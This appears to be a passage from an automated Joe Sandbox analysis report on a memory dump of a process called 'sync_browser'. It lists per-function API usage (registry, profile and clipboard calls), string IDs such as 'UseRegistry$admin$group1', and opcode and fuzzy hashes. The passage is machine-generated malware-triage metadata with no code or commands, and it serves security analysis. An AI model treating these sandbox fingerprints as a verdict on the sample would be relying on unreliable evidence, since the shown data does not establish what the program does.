                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _get_daylight$CurrentProcess__tzset_errno_isindst
                                                                                          • String ID:
                                                                                          • API String ID: 1870958493-0
                                                                                          • Opcode ID: d42586344bd6afb1d42c0f7a2c15e1262e76e9d2421f5cfeb9a02ae854df84cf
                                                                                          • Instruction ID: e08f90a11b077dced49db5dc1ba727d23d895f2c7b1dc6ba1825798d6766d3ec
                                                                                          • Opcode Fuzzy Hash: d42586344bd6afb1d42c0f7a2c15e1262e76e9d2421f5cfeb9a02ae854df84cf
                                                                                          • Instruction Fuzzy Hash: 4971D873F345024BE728CB24D9516BCA696AB74358F948135FE0DCAAD9DF3CA949C600
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 1239891234-0
                                                                                          • Opcode ID: cab22b7f63e68bd4fe1f659d6095baf5ecdb6c5b170d8f81b70fd2e30acf9a7e
                                                                                          • Instruction ID: 23eabe82a8fd1f71cb506c1296c86c4f925fa513ca6d2c0480f0b5ce6c7ebf39
                                                                                          • Opcode Fuzzy Hash: cab22b7f63e68bd4fe1f659d6095baf5ecdb6c5b170d8f81b70fd2e30acf9a7e
                                                                                          • Instruction Fuzzy Hash: 73313133A28B8289EB60CF25E8406AEB3A4FB94754F540135FA9D93B95DF3CD549CB00
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ClipboardGlobal$AllocDataEmptyLockOpenUnlock
                                                                                          • String ID:
                                                                                          • API String ID: 2715784024-0
                                                                                          • Opcode ID: e11c53b316a9bfdc0ba5bcfd4052570f78fa6fe53520f5204ff61f5d8110080f
                                                                                          • Instruction ID: aae43235343641499b5cbc8f2109a4ba70a9e6bfa0bd0b8b920abd8c4d1025c5
                                                                                          • Opcode Fuzzy Hash: e11c53b316a9bfdc0ba5bcfd4052570f78fa6fe53520f5204ff61f5d8110080f
                                                                                          • Instruction Fuzzy Hash: C201B112F3968282FF044F29A818275A295EFA5BE4F081234FD2E877C1DE2CE04AC610
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Iconic
                                                                                          • String ID: 0
                                                                                          • API String ID: 110040809-4108050209
                                                                                          • Opcode ID: ada12bffe0504ce749bfb447d148339bb7949db47e61c86c1c89a82587fb054e
                                                                                          • Instruction ID: 45992f6a0d66ab6b4fb7fe504da470d509ae474ad9bb786dc1553d89613e99be
                                                                                          • Opcode Fuzzy Hash: ada12bffe0504ce749bfb447d148339bb7949db47e61c86c1c89a82587fb054e
                                                                                          • Instruction Fuzzy Hash: FBA119336146918BE758CF39D541AA8B7E0FB58B54F048039EB59C7649EF3CE8A9CB10
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF67E7CD390: GetModuleFileNameA.KERNEL32 ref: 00007FF67E7CD3BB
                                                                                          • GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E817D89
                                                                                            • Part of subcall function 00007FF67E817650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E817689
                                                                                            • Part of subcall function 00007FF67E817650: RegCreateKeyExA.ADVAPI32 ref: 00007FF67E8176DD
                                                                                            • Part of subcall function 00007FF67E817650: RegCreateKeyExA.ADVAPI32 ref: 00007FF67E817722
                                                                                            • Part of subcall function 00007FF67E8178E0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E81792E
                                                                                            • Part of subcall function 00007FF67E8178E0: RegQueryValueExA.ADVAPI32 ref: 00007FF67E81796A
                                                                                            • Part of subcall function 00007FF67E8178E0: RegQueryValueExA.ADVAPI32 ref: 00007FF67E8179B2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: PrivateProfile$CreateQueryValue$FileModuleName
                                                                                          • String ID: UseRegistry$admin$group3
                                                                                          • API String ID: 1728753321-3776872688
                                                                                          • Opcode ID: da8d5682ec0159b53c6e6ac02bc9a146a6fe897d91bd88be9db6412787fbbace
                                                                                          • Instruction ID: f5ec5bdaa1abbe4af1da3c781a83332d7b90ed317a86c50d2169384621419904
                                                                                          • Opcode Fuzzy Hash: da8d5682ec0159b53c6e6ac02bc9a146a6fe897d91bd88be9db6412787fbbace
                                                                                          • Instruction Fuzzy Hash: A7112133E3858281FA61AB60F4613F9A350FFA9340F84013AF65E866A6CE3DE50DC700
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF67E7CD390: GetModuleFileNameA.KERNEL32 ref: 00007FF67E7CD3BB
                                                                                          • GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E817C09
                                                                                            • Part of subcall function 00007FF67E817650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E817689
                                                                                            • Part of subcall function 00007FF67E817650: RegCreateKeyExA.ADVAPI32 ref: 00007FF67E8176DD
                                                                                            • Part of subcall function 00007FF67E817650: RegCreateKeyExA.ADVAPI32 ref: 00007FF67E817722
                                                                                            • Part of subcall function 00007FF67E8178E0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E81792E
                                                                                            • Part of subcall function 00007FF67E8178E0: RegQueryValueExA.ADVAPI32 ref: 00007FF67E81796A
                                                                                            • Part of subcall function 00007FF67E8178E0: RegQueryValueExA.ADVAPI32 ref: 00007FF67E8179B2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: PrivateProfile$CreateQueryValue$FileModuleName
                                                                                          • String ID: UseRegistry$admin$group1
                                                                                          • API String ID: 1728753321-252764636
                                                                                          • Opcode ID: dc4ee2f34963cf6fb66591f643b46c4958349bc6d42a33ae21c770aef2cc3bec
                                                                                          • Instruction ID: 6323602c9b40286a54d385ba8c43e6161c004550d3024f5c2c18a618ead59ead
                                                                                          • Opcode Fuzzy Hash: dc4ee2f34963cf6fb66591f643b46c4958349bc6d42a33ae21c770aef2cc3bec
                                                                                          • Instruction Fuzzy Hash: 05111223E3898281EA61AB50F4913F9A351FFA9340F840139F55D866A6CE3DE50DD700
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF67E7CD390: GetModuleFileNameA.KERNEL32 ref: 00007FF67E7CD3BB
                                                                                          • GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E817CC9
                                                                                            • Part of subcall function 00007FF67E817650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E817689
                                                                                            • Part of subcall function 00007FF67E817650: RegCreateKeyExA.ADVAPI32 ref: 00007FF67E8176DD
                                                                                            • Part of subcall function 00007FF67E817650: RegCreateKeyExA.ADVAPI32 ref: 00007FF67E817722
                                                                                            • Part of subcall function 00007FF67E8178E0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E81792E
                                                                                            • Part of subcall function 00007FF67E8178E0: RegQueryValueExA.ADVAPI32 ref: 00007FF67E81796A
                                                                                            • Part of subcall function 00007FF67E8178E0: RegQueryValueExA.ADVAPI32 ref: 00007FF67E8179B2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: PrivateProfile$CreateQueryValue$FileModuleName
                                                                                          • String ID: UseRegistry$admin$group2
                                                                                          • API String ID: 1728753321-2518265958
                                                                                          • Opcode ID: 42ecbddd9c1df14715f3163af6785be1f325581b827072a0f24e6963c90d4554
                                                                                          • Instruction ID: d11b609e16e0cee665b7c4a018224ae58a3bc7ed8cfbc15348f93237c89b0dd1
                                                                                          • Opcode Fuzzy Hash: 42ecbddd9c1df14715f3163af6785be1f325581b827072a0f24e6963c90d4554
                                                                                          • Instruction Fuzzy Hash: 4D112533E3854281FA61AB60E4513F9A350FFA9340F840139F55E865A6CE3DE50DC700
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF67E7CD390: GetModuleFileNameA.KERNEL32 ref: 00007FF67E7CD3BB
                                                                                          • GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E817F8D
                                                                                            • Part of subcall function 00007FF67E817650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E817689
                                                                                            • Part of subcall function 00007FF67E817650: RegCreateKeyExA.ADVAPI32 ref: 00007FF67E8176DD
                                                                                            • Part of subcall function 00007FF67E817650: RegCreateKeyExA.ADVAPI32 ref: 00007FF67E817722
                                                                                            • Part of subcall function 00007FF67E8177F0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E817840
                                                                                            • Part of subcall function 00007FF67E8177F0: RegQueryValueExA.ADVAPI32 ref: 00007FF67E81787D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: PrivateProfile$Create$FileModuleNameQueryValue
                                                                                          • String ID: UseRegistry$admin$locdom3
                                                                                          • API String ID: 1788981264-1943432916
                                                                                          • Opcode ID: 9d8487c70b1b00fa5a82c873ed5b00f7b51de020590ec98eeb4ab258b7261688
                                                                                          • Instruction ID: 541dcc281353cdb77944f051c3ea216584f4846b44e471673caf9a635463d6ba
                                                                                          • Opcode Fuzzy Hash: 9d8487c70b1b00fa5a82c873ed5b00f7b51de020590ec98eeb4ab258b7261688
                                                                                          • Instruction Fuzzy Hash: DF012123E3858281FA21DB74A4913B6E391EFB9304F810539F62EC65D6DE3DE54DD600
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF67E7CD390: GetModuleFileNameA.KERNEL32 ref: 00007FF67E7CD3BB
                                                                                          • GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E817E50
                                                                                            • Part of subcall function 00007FF67E817650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E817689
                                                                                            • Part of subcall function 00007FF67E817650: RegCreateKeyExA.ADVAPI32 ref: 00007FF67E8176DD
                                                                                            • Part of subcall function 00007FF67E817650: RegCreateKeyExA.ADVAPI32 ref: 00007FF67E817722
                                                                                            • Part of subcall function 00007FF67E8177F0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E817840
                                                                                            • Part of subcall function 00007FF67E8177F0: RegQueryValueExA.ADVAPI32 ref: 00007FF67E81787D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: PrivateProfile$Create$FileModuleNameQueryValue
                                                                                          • String ID: UseRegistry$admin$locdom1
                                                                                          • API String ID: 1788981264-2648182776
                                                                                          • Opcode ID: 90366ba7cc0c0a2881363750c1573ef4067fd92e56bfccd46d2f838935763d96
                                                                                          • Instruction ID: 106fcb3be87d2c9141303029cea6fa4defe9c24fe86551095871f3759d7ee463
                                                                                          • Opcode Fuzzy Hash: 90366ba7cc0c0a2881363750c1573ef4067fd92e56bfccd46d2f838935763d96
                                                                                          • Instruction Fuzzy Hash: A4015E23B3CA4381FB21AB64E4913B5A291EF79304F800139F62EC62D6DE3DE94DC600
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF67E7CD390: GetModuleFileNameA.KERNEL32 ref: 00007FF67E7CD3BB
                                                                                          • GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E817EED
                                                                                            • Part of subcall function 00007FF67E817650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E817689
                                                                                            • Part of subcall function 00007FF67E817650: RegCreateKeyExA.ADVAPI32 ref: 00007FF67E8176DD
                                                                                            • Part of subcall function 00007FF67E817650: RegCreateKeyExA.ADVAPI32 ref: 00007FF67E817722
                                                                                            • Part of subcall function 00007FF67E8177F0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E817840
                                                                                            • Part of subcall function 00007FF67E8177F0: RegQueryValueExA.ADVAPI32 ref: 00007FF67E81787D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: PrivateProfile$Create$FileModuleNameQueryValue
                                                                                          • String ID: UseRegistry$admin$locdom2
                                                                                          • API String ID: 1788981264-80830018
                                                                                          • Opcode ID: 453e7d21788d8a281cd3351b72fc90b6b80e6296ed96c2d368ba72f2aba873be
                                                                                          • Instruction ID: 7296f2190cb1316bbe8d0d53725e603fa3912f6ce09aa81c92d55446813b5d1b
                                                                                          • Opcode Fuzzy Hash: 453e7d21788d8a281cd3351b72fc90b6b80e6296ed96c2d368ba72f2aba873be
                                                                                          • Instruction Fuzzy Hash: 35012123E3858281FA21DB74A4953B6A391EFB9304F810539F52EC6596DE3DE54DD600
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Object$Select$Delete$CompatibleCreateIconMetricsSystem$CursorDrawFlushInfoRect
                                                                                          • String ID: F
                                                                                          • API String ID: 2202639625-1304234792
                                                                                          • Opcode ID: b79674502bec6eb6e9178b59d754768edd22f48091c48e79f06fd71b0c89d9c2
                                                                                          • Instruction ID: 42c98917a296c0dd9da8b19637784faac7e5a4158c2d37cea886507ee09738fc
                                                                                          • Opcode Fuzzy Hash: b79674502bec6eb6e9178b59d754768edd22f48091c48e79f06fd71b0c89d9c2
                                                                                          • Instruction Fuzzy Hash: 2FC16C37A186968AE790CFA9D6489AE73BDFF58784F010436EE0993714DF7C9849CB10
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
